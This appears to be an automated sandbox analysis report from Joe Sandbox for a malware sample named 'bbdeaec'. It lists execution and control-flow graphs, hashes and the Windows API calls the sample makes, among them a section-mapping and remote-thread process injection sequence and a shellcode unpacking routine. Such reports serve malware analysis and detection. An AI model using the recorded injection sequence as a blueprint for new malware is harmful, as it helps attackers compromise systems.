                                                                                                                                              • Opcode ID: 61f8dc8ebc24ede4eb8e4a0143fdbea6a03498d823c57421016280b11032f58e
                                                                                                                                              • Instruction ID: 8c89bf7d4130e696c480860fcb39a5bc1e7e3be71cd24c060f983e8645672567
                                                                                                                                              • Opcode Fuzzy Hash: 61f8dc8ebc24ede4eb8e4a0143fdbea6a03498d823c57421016280b11032f58e
                                                                                                                                              • Instruction Fuzzy Hash: 12C08C30702605E0EB1AABE3AC423C022A0B32C3C8FC00C0ADA0943230CEBCC6CBC700

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:7%
                                                                                                                                              Dynamic/Decrypted Code Coverage:28.6%
                                                                                                                                              Signature Coverage:0%
                                                                                                                                              Total number of Nodes:168
                                                                                                                                              Total number of Limit Nodes:7
                                                                                                                                              execution_graph 4435 403043 4436 40319a 4435->4436 4437 40306d 4435->4437 4437->4436 4438 403128 RtlCreateUserThread NtTerminateProcess 4437->4438 4438->4436 4479 6b0120 4480 6b012f 4479->4480 4483 6b08c0 4480->4483 4488 6b08db 4483->4488 4484 6b08e4 CreateToolhelp32Snapshot 4485 6b0900 Module32First 4484->4485 4484->4488 4486 6b090f 4485->4486 4489 6b0138 4485->4489 4490 6b057f 4486->4490 4488->4484 4488->4485 4491 6b05aa 4490->4491 4492 6b05bb VirtualAlloc 4491->4492 4493 6b05f3 4491->4493 4492->4493 4493->4493 4520 4014cf 4521 4014d3 4520->4521 4522 401660 NtDuplicateObject 4521->4522 4531 401571 4521->4531 4523 40167d NtCreateSection 4522->4523 4522->4531 4524 4016a3 NtMapViewOfSection 4523->4524 4525 4016fd NtCreateSection 4523->4525 4524->4525 4527 4016c6 NtMapViewOfSection 4524->4527 4526 401729 4525->4526 4525->4531 4528 401733 NtMapViewOfSection 4526->4528 4526->4531 4527->4525 4529 4016e4 4527->4529 4530 40175a NtMapViewOfSection 4528->4530 4528->4531 4529->4525 4530->4531 4621 4015d5 4622 4015e4 4621->4622 4623 401660 NtDuplicateObject 4622->4623 4632 40177c 4622->4632 4624 40167d NtCreateSection 4623->4624 4623->4632 4625 4016a3 NtMapViewOfSection 4624->4625 4626 4016fd NtCreateSection 4624->4626 4625->4626 4628 4016c6 NtMapViewOfSection 4625->4628 4627 401729 4626->4627 4626->4632 4629 401733 NtMapViewOfSection 4627->4629 4627->4632 4628->4626 4630 4016e4 4628->4630 4631 40175a NtMapViewOfSection 4629->4631 4629->4632 4630->4626 4631->4632 4458 402f16 4459 402f1a 4458->4459 4461 402fa2 4459->4461 4462 401991 4459->4462 4463 4019a0 4462->4463 4464 4019d8 Sleep 4463->4464 4466 4019f3 4464->4466 4467 4014c4 4464->4467 4466->4461 4468 4014d3 4467->4468 4469 401660 NtDuplicateObject 4468->4469 4478 401571 4468->4478 4470 40167d NtCreateSection 4469->4470 4469->4478 4471 4016a3 NtMapViewOfSection 4470->4471 4472 4016fd NtCreateSection 4470->4472 4471->4472 4474 4016c6 NtMapViewOfSection 4471->4474 4473 401729 4472->4473 4472->4478 4475 401733 NtMapViewOfSection 4473->4475 4473->4478 4474->4472 4476 4016e4 4474->4476 4477 40175a NtMapViewOfSection 4475->4477 4475->4478 4476->4472 4477->4478 4478->4466 4633 416dd7 4634 416de0 4633->4634 4635 416da0 SetPriorityClass 4634->4635 4636 416dfb 4634->4636 4635->4634 4592 402e9a 4593 402e5f 4592->4593 4594 402eaf 4592->4594 4595 401991 8 API calls 4594->4595 4596 402fa2 4594->4596 4595->4596 4494 5a0001 4495 5a0005 4494->4495 4500 5a092b GetPEB 4495->4500 4497 5a0030 4502 5a003c 4497->4502 4501 5a0972 4500->4501 4501->4497 4503 5a0049 4502->4503 4504 5a0e0f 2 API calls 4503->4504 4505 5a0223 4504->4505 4506 5a0d90 GetPEB 4505->4506 4507 5a0238 VirtualAlloc 4506->4507 4508 5a0265 4507->4508 4509 5a02ce VirtualProtect 4508->4509 4511 5a030b 4509->4511 4510 5a0439 VirtualFree 4514 5a04be LoadLibraryA 4510->4514 4511->4510 4513 5a08c7 4514->4513 4515 5a0005 4516 5a092b GetPEB 4515->4516 4517 5a0030 4516->4517 4518 5a003c 7 API calls 4517->4518 4519 5a0038 4518->4519 4439 5a003c 4440 5a0049 4439->4440 4452 5a0e0f SetErrorMode SetErrorMode 4440->4452 4445 5a0265 4446 5a02ce VirtualProtect 4445->4446 4448 5a030b 4446->4448 4447 5a0439 VirtualFree 4451 5a04be LoadLibraryA 4447->4451 4448->4447 4450 5a08c7 4451->4450 4453 5a0223 4452->4453 4454 5a0d90 4453->4454 4455 5a0dad 4454->4455 4456 5a0dbb GetPEB 4455->4456 4457 5a0238 VirtualAlloc 4455->4457 4456->4457 4457->4445 4544 402ee7 4545 402ef9 4544->4545 4546 401991 8 API calls 4545->4546 4547 402fa2 4545->4547 4546->4547 4661 4171e6 4662 4171f0 LoadLibraryW 4661->4662 4671 416bd0 GetModuleHandleW GetProcAddress VirtualProtect 4662->4671 4665 41721d 4666 416e20 8 API calls 4665->4666 4667 417222 4666->4667 4668 417263 InterlockedDecrement 4667->4668 4669 417243 MoveFileA 4667->4669 4670 417279 4667->4670 4668->4667 4669->4667 4671->4665 4684 4019a9 4685 4019a0 4684->4685 4686 4019d8 Sleep 4685->4686 4687 4014c4 7 API calls 4686->4687 4688 4019f3 4686->4688 4687->4688 4380 4172f0 4383 416ec0 4380->4383 4382 4172f5 4384 416ecd 4383->4384 4385 4170df 4384->4385 4386 416fcf InterlockedCompareExchange GetFocus ReadConsoleW FindAtomW SetConsoleMode 4384->4386 4387 4170f0 SetCommState 4385->4387 4391 417109 4385->4391 4388 417017 7 API calls 4386->4388 4387->4385 4389 4170c0 4388->4389 4390 4170b4 ObjectPrivilegeAuditAlarmA 4388->4390 4392 4170d0 4389->4392 4393 4170c9 ReleaseMutex 4389->4393 4390->4389 4394 4171c2 4391->4394 4395 417116 8 API calls 4391->4395 4392->4385 4393->4392 4408 416ba0 LocalAlloc 4394->4408 4406 417193 4395->4406 4399 41721d 4410 416e20 4399->4410 4400 4171c7 LoadLibraryW 4409 416bd0 GetModuleHandleW GetProcAddress VirtualProtect 4400->4409 4402 417239 MoveFileA 4403 417222 4402->4403 4403->4402 4404 417263 InterlockedDecrement 4403->4404 4407 417279 4403->4407 4404->4403 4406->4394 4407->4382 4408->4400 4409->4399 4411 416e49 QueryDosDeviceA 4410->4411 4412 416e5a 4410->4412 4411->4412 4421 416d70 4412->4421 4415 416e75 4424 416db0 4415->4424 4416 416e6d FreeEnvironmentStringsW 4416->4415 4419 416ea3 4419->4403 4420 416e8c HeapDestroy GetNumaProcessorNode 4420->4419 4422 416d81 FatalAppExitA GetModuleHandleW 4421->4422 4423 416d93 4421->4423 4422->4423 4423->4415 4423->4416 4425 416dc3 BuildCommDCBA 4424->4425 4427 416dcf 4424->4427 4425->4427 4426 416dfb 4426->4419 4426->4420 4427->4426 4429 416da0 4427->4429 4432 416d20 4429->4432 4433 416d4b 4432->4433 4434 416d3c SetPriorityClass 4432->4434 4433->4427 4434->4433 4597 401975 4598 401979 4597->4598 4599 4014c4 7 API calls 4598->4599 4600 4019f3 4599->4600

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 0 416ec0-416ee8 2 416ef0-416ef7 0->2 3 416f24-416f2a 2->3 4 416ef9-416f20 2->4 5 416f2c-416f38 3->5 6 416f3e-416f48 3->6 4->3 5->6 7 416f83-416f8a 6->7 8 416f4a-416f79 6->8 7->2 9 416f90-416f96 7->9 8->7 11 416f98-416f9e 9->11 12 416fa0-416fa6 11->12 13 416fac-416fb3 11->13 12->13 14 416fb5 13->14 15 416fb9-416fc0 13->15 14->15 15->11 16 416fc2-416fc9 15->16 17 4170df-4170ed 16->17 18 416fcf-4170b2 InterlockedCompareExchange GetFocus ReadConsoleW FindAtomW SetConsoleMode GetDefaultCommConfigA CopyFileA CreatePipe GetEnvironmentStringsW ReadConsoleOutputA GetModuleFileNameA GetSystemTimeAdjustment 16->18 19 4170f0-4170fe SetCommState 17->19 22 4170c0-4170c7 18->22 23 4170b4-4170ba ObjectPrivilegeAuditAlarmA 18->23 24 417100-417107 19->24 25 417109-417110 19->25 26 4170d0-4170dc 22->26 27 4170c9-4170ca ReleaseMutex 22->27 23->22 24->19 24->25 28 4171c2-4171d1 call 416ba0 25->28 29 417116-4171bc GetConsoleAliasesLengthW GetComputerNameW GetFileAttributesA GetConsoleAliasExesLengthA GetBinaryType FormatMessageA GetLongPathNameW GetCommTimeouts 25->29 26->17 27->26 34 4171d3-4171e4 28->34 35 41720d-417218 LoadLibraryW call 416bd0 28->35 29->28 38 4171f0-417200 34->38 40 41721d-41722e call 416e20 35->40 41 417202 38->41 42 417208-41720b 38->42 46 417230-417237 40->46 41->42 42->35 42->38 48 417239-417247 MoveFileA 46->48 49 41724d-417253 46->49 48->49 51 417255 call 416bc0 49->51 52 41725a-417261 49->52 51->52 55 417270-417277 52->55 56 417263-41726a InterlockedDecrement 52->56 55->46 57 417279-417289 55->57 56->55 59 417290-4172a0 57->59 61 4172a2 59->61 62 4172a9-4172ac 59->62 61->62 62->59 64 4172ae-4172b9 62->64 65 4172c0-4172c5 64->65 66 4172c7-4172cd 65->66 67 4172cf-4172d5 65->67 66->67 68 4172d7-4172e4 66->68 67->65 67->68
                                                                                                                                              APIs
                                                                                                                                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00416FDA
                                                                                                                                              • GetFocus.USER32 ref: 00416FE0
                                                                                                                                              • ReadConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00416FED
                                                                                                                                              • FindAtomW.KERNEL32(00000000), ref: 00416FF4
                                                                                                                                              • SetConsoleMode.KERNEL32(00000000,00000000), ref: 00416FFC
                                                                                                                                              • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00417023
                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0041702C
                                                                                                                                              • CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00417042
                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00417048
                                                                                                                                              • ReadConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 0041708D
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 0041709C
                                                                                                                                              • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 004170A5
                                                                                                                                              • ObjectPrivilegeAuditAlarmA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004170BA
                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 004170CA
                                                                                                                                              • SetCommState.KERNELBASE(00000000,00000000), ref: 004170F4
                                                                                                                                              • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00417125
                                                                                                                                              • GetComputerNameW.KERNEL32(?,?), ref: 00417139
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00417140
                                                                                                                                              • GetConsoleAliasExesLengthA.KERNEL32 ref: 00417146
                                                                                                                                              • GetBinaryType.KERNEL32(0041934C,?), ref: 00417158
                                                                                                                                              • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041716B
                                                                                                                                              • GetLongPathNameW.KERNEL32(00419360,?,00000000), ref: 0041717E
                                                                                                                                              • GetCommTimeouts.KERNEL32(00000000,00000000), ref: 00417186
                                                                                                                                              • LoadLibraryW.KERNELBASE(00419374), ref: 00417212
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000C.00000002.2755455829.000000000040B000.00000020.00000001.01000000.00000009.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_12_2_40b000_bbdeaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Console$CommFileName$LengthRead$AdjustmentAlarmAliasAliasesAtomAttributesAuditBinaryCompareComputerConfigCopyCreateDefaultEnvironmentExchangeExesFindFocusFormatInterlockedLibraryLoadLongMessageModeModuleMutexObjectOutputPathPipePrivilegeReleaseStateStringsSystemTimeTimeoutsType
                                                                                                                                              • String ID: k`$}$
                                                                                                                                              • API String ID: 4079765171-956986773
                                                                                                                                              • Opcode ID: e48a6f0bb2816fd1668c4873402b9e0f65a5613ee82e10785e95a09dc4e62c78
                                                                                                                                              • Instruction ID: bd4547cb626b20a29bef7dd1c272b8299b50ccc80d2d00de4cf5370715da157f
                                                                                                                                              • Opcode Fuzzy Hash: e48a6f0bb2816fd1668c4873402b9e0f65a5613ee82e10785e95a09dc4e62c78
                                                                                                                                              • Instruction Fuzzy Hash: 06A1C171801128ABC724DB61EC45BDF7B78EF5D314F0181AEF609A3160DB385A89CBAD

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 155 4014c4-4014f6 161 4014f9-40150d call 401240 155->161 166 401512-401513 161->166 167 401544-401545 166->167 168 401515-401528 166->168 170 401547 167->170 171 4015bd-4015d4 167->171 168->161 169 40152a-401535 168->169 169->166 173 401537-401543 169->173 174 401596-4015a6 170->174 175 401549-40154b 170->175 173->167 176 4015a8 174->176 175->176 178 40154d-40156d 175->178 179 4015e7-40160a call 401240 178->179 180 40156f 178->180 189 40160c 179->189 190 40160f-401614 179->190 182 401571 180->182 183 4015e2-4015e3 180->183 183->179 189->190 192 40161a-40162b 190->192 193 40193e-401946 190->193 196 401631-40165a 192->196 197 40193c 192->197 193->190 198 40194b-40198e call 401240 193->198 196->197 206 401660-401677 NtDuplicateObject 196->206 197->198 206->197 208 40167d-4016a1 NtCreateSection 206->208 210 4016a3-4016c4 NtMapViewOfSection 208->210 211 4016fd-401723 NtCreateSection 208->211 210->211 214 4016c6-4016e2 NtMapViewOfSection 210->214 211->197 212 401729-40172d 211->212 212->197 215 401733-401754 NtMapViewOfSection 212->215 214->211 217 4016e4-4016fa 214->217 215->197 218 40175a-401776 NtMapViewOfSection 215->218 217->211 218->197 221 40177c 218->221 221->197 223 40177c call 401781 221->223 223->197
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000C.00000002.2755426402.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_bbdeaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c781147eb40cf50f9b808a26197604c885e6d7acefaf94bd50111952dd5c1550
                                                                                                                                              • Instruction ID: a2440897234d9063cbd2a71cb92c382042c3cd10596cdc4f18a7c269882a1901
                                                                                                                                              • Opcode Fuzzy Hash: c781147eb40cf50f9b808a26197604c885e6d7acefaf94bd50111952dd5c1550
                                                                                                                                              • Instruction Fuzzy Hash: 0981D5B4504244FBDB208F95CC49FEB7BB8EF81740F20416BF902BA1E5D6749902DB66

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 224 4015d5-4015e4 226 4015f4 224->226 227 4015eb-4015f0 224->227 226->227 228 4015f7-40160a call 401240 226->228 227->228 231 40160c 228->231 232 40160f-401614 228->232 231->232 234 40161a-40162b 232->234 235 40193e-401946 232->235 238 401631-40165a 234->238 239 40193c 234->239 235->232 240 40194b-40198e call 401240 235->240 238->239 248 401660-401677 NtDuplicateObject 238->248 239->240 248->239 250 40167d-4016a1 NtCreateSection 248->250 252 4016a3-4016c4 NtMapViewOfSection 250->252 253 4016fd-401723 NtCreateSection 250->253 252->253 256 4016c6-4016e2 NtMapViewOfSection 252->256 253->239 254 401729-40172d 253->254 254->239 257 401733-401754 NtMapViewOfSection 254->257 256->253 259 4016e4-4016fa 256->259 257->239 260 40175a-401776 NtMapViewOfSection 257->260 259->253 260->239 263 40177c 260->263 263->239 265 40177c call 401781 263->265 265->239
                                                                                                                                              APIs
                                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000C.00000002.2755426402.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_bbdeaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1546783058-0
                                                                                                                                              • Opcode ID: ad48f6f44a2631cca022906d065bca6458850cc5bc24c7cb6bd5a1b8da74fc92
                                                                                                                                              • Instruction ID: 5b275a0397ac31cab10c66c3112b8ecfdbc4447489e22d1c2cba3eb21d005058
                                                                                                                                              • Opcode Fuzzy Hash: ad48f6f44a2631cca022906d065bca6458850cc5bc24c7cb6bd5a1b8da74fc92
                                                                                                                                              • Instruction Fuzzy Hash: 8251F9B5900245BBEB208F91CC48FEF7BB8EF85710F10416AFA11BA2A5D7759941CB64

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 266 4015df-4015e4 268 4015f4 266->268 269 4015eb-4015f0 266->269 268->269 270 4015f7-40160a call 401240 268->270 269->270 273 40160c 270->273 274 40160f-401614 270->274 273->274 276 40161a-40162b 274->276 277 40193e-401946 274->277 280 401631-40165a 276->280 281 40193c 276->281 277->274 282 40194b-40198e call 401240 277->282 280->281 290 401660-401677 NtDuplicateObject 280->290 281->282 290->281 292 40167d-4016a1 NtCreateSection 290->292 294 4016a3-4016c4 NtMapViewOfSection 292->294 295 4016fd-401723 NtCreateSection 292->295 294->295 298 4016c6-4016e2 NtMapViewOfSection 294->298 295->281 296 401729-40172d 295->296 296->281 299 401733-401754 NtMapViewOfSection 296->299 298->295 301 4016e4-4016fa 298->301 299->281 302 40175a-401776 NtMapViewOfSection 299->302 301->295 302->281 305 40177c 302->305 305->281 307 40177c call 401781 305->307 307->281
                                                                                                                                              APIs
                                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000C.00000002.2755426402.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_bbdeaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1546783058-0
                                                                                                                                              • Opcode ID: 44c0db395121e6769fce0a0aa4e09f1bf5d5ed1a6152a03509b78bf3449358c6
                                                                                                                                              • Instruction ID: aa7ad941c6157971e71dc2736092b98b642c15495c2c07021be349f0f8194e9f
                                                                                                                                              • Opcode Fuzzy Hash: 44c0db395121e6769fce0a0aa4e09f1bf5d5ed1a6152a03509b78bf3449358c6
                                                                                                                                              • Instruction Fuzzy Hash: 4D51FAB5900249BBEB208F91CC48FEF7BB8EF85710F10015AFA11BA2A5D7749945CB64

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 308 4015f2-4015f4 310 4015f7-40160a call 401240 308->310 311 4015eb-4015f0 308->311 314 40160c 310->314 315 40160f-401614 310->315 311->310 314->315 317 40161a-40162b 315->317 318 40193e-401946 315->318 321 401631-40165a 317->321 322 40193c 317->322 318->315 323 40194b-40198e call 401240 318->323 321->322 331 401660-401677 NtDuplicateObject 321->331 322->323 331->322 333 40167d-4016a1 NtCreateSection 331->333 335 4016a3-4016c4 NtMapViewOfSection 333->335 336 4016fd-401723 NtCreateSection 333->336 335->336 339 4016c6-4016e2 NtMapViewOfSection 335->339 336->322 337 401729-40172d 336->337 337->322 340 401733-401754 NtMapViewOfSection 337->340 339->336 342 4016e4-4016fa 339->342 340->322 343 40175a-401776 NtMapViewOfSection 340->343 342->336 343->322 346 40177c 343->346 346->322 348 40177c call 401781 346->348 348->322
                                                                                                                                              APIs
                                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000C.00000002.2755426402.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_bbdeaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1546783058-0
                                                                                                                                              • Opcode ID: c30ea274402ef54bc02bb138cff093cc3ebd3018c4b2b801df8b24d7e4f91f61
                                                                                                                                              • Instruction ID: 51677960ee3875d5e78d4b2c0b9a124aae989836c1cf5ff6a0c78d9f2f0b6c9a
                                                                                                                                              • Opcode Fuzzy Hash: c30ea274402ef54bc02bb138cff093cc3ebd3018c4b2b801df8b24d7e4f91f61
                                                                                                                                              • Instruction Fuzzy Hash: 8E51FAB5900249BBEB208F91CC48FAFBBB8EF85710F10415AF911BA2A5D7759941CB64

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 349 4015e6-40160a call 401240 354 40160c 349->354 355 40160f-401614 349->355 354->355 357 40161a-40162b 355->357 358 40193e-401946 355->358 361 401631-40165a 357->361 362 40193c 357->362 358->355 363 40194b-40198e call 401240 358->363 361->362 371 401660-401677 NtDuplicateObject 361->371 362->363 371->362 373 40167d-4016a1 NtCreateSection 371->373 375 4016a3-4016c4 NtMapViewOfSection 373->375 376 4016fd-401723 NtCreateSection 373->376 375->376 379 4016c6-4016e2 NtMapViewOfSection 375->379 376->362 377 401729-40172d 376->377 377->362 380 401733-401754 NtMapViewOfSection 377->380 379->376 382 4016e4-4016fa 379->382 380->362 383 40175a-401776 NtMapViewOfSection 380->383 382->376 383->362 386 40177c 383->386 386->362 388 40177c call 401781 386->388 388->362
                                                                                                                                              APIs
                                                                                                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                                                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                                                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000C.00000002.2755426402.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_bbdeaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Section$View$Create$DuplicateObject
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1546783058-0
                                                                                                                                              • Opcode ID: ff9639ba48af835a0036563bc059b505b16d709b75bd7c76b087d7be9fc5f6d4
                                                                                                                                              • Instruction ID: 771dbcf6e2504e630b0d67c3c545d31db11f89db77175d6a648901ef483dfe93
                                                                                                                                              • Opcode Fuzzy Hash: ff9639ba48af835a0036563bc059b505b16d709b75bd7c76b087d7be9fc5f6d4
                                                                                                                                              • Instruction Fuzzy Hash: 5451F9B5900249BFEB208F91CC48FEFBBB8EF85B10F100159F911BA2A5D7709945CB64

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 419 403043-403067 420 40319a-40319f 419->420 421 40306d-403085 419->421 421->420 422 40308b-40309c 421->422 423 40309e-4030a7 422->423 424 4030ac-4030ba 423->424 424->424 425 4030bc-4030c3 424->425 426 4030e5-4030ec 425->426 427 4030c5-4030e4 425->427 428 40310e-403111 426->428 429 4030ee-40310d 426->429 427->426 430 403113-403116 428->430 431 40311a 428->431 429->428 430->431 432 403118 430->432 431->423 433 40311c-403121 431->433 432->433 433->420 434 403123-403126 433->434 434->420 435 403128-403197 RtlCreateUserThread NtTerminateProcess 434->435 435->420
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000C.00000002.2755426402.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_bbdeaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateProcessTerminateThreadUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1921587553-0
                                                                                                                                              • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                                              • Instruction ID: 174b4c01c38e91558bfb09f2734ea8af57ab2b253068959c7a4b5a028629c542
                                                                                                                                              • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                                              • Instruction Fuzzy Hash: 2D415A31218E084FD768EF5CA84976277D5FB98311F6A43BAE809D7385EA34DC1183C9

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
